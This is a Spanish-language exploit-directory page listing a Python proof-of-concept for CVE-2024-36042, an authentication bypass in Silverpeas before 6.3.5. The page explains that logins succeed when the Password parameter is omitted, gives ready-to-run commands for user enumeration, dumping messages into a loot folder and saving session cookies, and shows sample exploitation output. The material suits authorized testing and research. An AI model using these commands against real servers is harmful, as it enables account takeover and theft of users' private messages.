Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — PoC en Python para la omisión de autenticación CVE-2024-36042 en Silverpeas < 6.3.5. Incluye detección de versiones, enumeración de usuarios multihilo, extracción de mensajes y generación de informes estructurados para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Autenticación y AutorizaciónReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

PoC en Python para la omisión de autenticación CVE-2024-36042 en Silverpeas < 6.3.5. Incluye detección de versiones, enumeración de usuarios multihilo, extracción de mensajes y generación de informes estructurados para pruebas de seguridad autorizadas.

Ver Repositorio
14hace 4 mesesAún no revisado
Compartir

Silverpeas-AuthBypass-CVE-2024-36042

Una prueba de concepto limpia y de nivel profesional en Python3 para CVE-2024-36042 — un bypass de autenticación en Silverpeas < 6.3.5 causado por la falta de validación de contraseña en AuthenticationServlet.

Python 3.8+ License: MIT


Resumen

Silverpeas AuthenticationServlet acepta una solicitud de inicio de sesión incluso cuando el parámetro Password se omite del cuerpo POST, otorgando acceso de sesión autenticado a cualquier nombre de usuario conocido. Esta herramienta demuestra la vulnerabilidad de manera responsable a través de un marco de explotación modular y con hilos que incluye reconocimiento avanzado, extracción de datos y generación de informes profesionales.

Afectado: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


Características

CaracterísticaDescripción
Detección de versiónIdentificar la versión de Silverpeas y el estado de vulnerabilidad antes de la explotación.
MultihiloEnumeración concurrente de usuarios mediante ThreadPoolExecutor con salida segura para hilos.
Descubrimiento avanzadoDescubrimiento de endpoints multilingüe (inglés/francés) con sondeo de múltiples ID.
Extracción de datosVolcado de mensajes de alta fidelidad con deduplicación y filtrado de contenido repetitivo.
Salida flexibleSoporte para consola, informes Markdown y exportación de archivos individuales (.md o .txt).
Proxy y depuraciónEnrutar a través de Burp/ZAP (--proxy) y guardar HTML sin procesar para depuración del analizador.
UX limpiaTablas de resumen ASCII, resaltado de palabras clave y control opcional de color ANSI.

Instalación

git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

Uso

Prueba rápida (lista de usuarios incorporada)

python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

Informes avanzados (Markdown + Consola)

python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

Exportación forense (archivos individuales por mensaje)

python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

Solo verificación de versión (sin explotación)

python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

A través de un proxy con registro HTML sin procesar

python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

Gestión de salida

La herramienta soporta cuatro modos de salida principales para los mensajes volcados mediante --message-output:

  1. console (Predeterminado): Imprime los mensajes limpios directamente en la terminal con resaltado de palabras clave.
  2. markdown: Genera un único informe {username}_messages.md por cuenta en el directorio de salida.
  3. files: Crea una carpeta por cuenta y guarda cada mensaje como un archivo individual (ej., message_0006.md) con IDs rellenados con ceros para un orden limpio en el sistema de archivos.
  4. both: Combina los modos console y markdown.

Estructura de artefactos

outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optional: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

Referencia de CLI

-t, --target        Base URL of Silverpeas (required)
-u, --user          Single username to target
--userlist          File with one username per line
--dump-messages     Scrape and display inbox messages
--max-id            Max message ID to check (default: 50)
--threads           Concurrent workers (default: 5)
--proxy             HTTP proxy URL
--message-output    Output mode: {console, markdown, files, both}
--output-format     File format: {md, txt}
--json              Export full JSON report
--csv               Export CSV of scraped messages
--outdir            Output directory for exports
--no-color          Disable ANSI color output (useful for logs)
--save-raw-html     Save original HTML responses for debugging
--check-version     Fingerprint version only
--no-exploit        Skip exploitation (pair with --check-version)
--quiet, -q         Minimal output
--no-banner         Suppress banner

Ejemplo de salida

[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

Por qué existe esto

Este repositorio es parte de mi portafolio de seguridad ofensiva. Demuestra:

  • Traducción de investigación de vulnerabilidades — convertir un CVE divulgado en un exploit funcional y confiable.
  • Herramientas de alta calidad — manejo robusto de errores, soporte multilingüe y gestión estructurada de salida.
  • Conciencia operativa — multihilo, soporte de proxy y lógica de deduplicación para entornos realistas.
  • Ingeniería profesional — arquitectura de código limpia, documentación completa y enfoque en la experiencia del operador (UX).

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas, investigación y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga permiso explícito antes de probar cualquier infraestructura que no posea.


Licencia

MIT

Descargar herramienta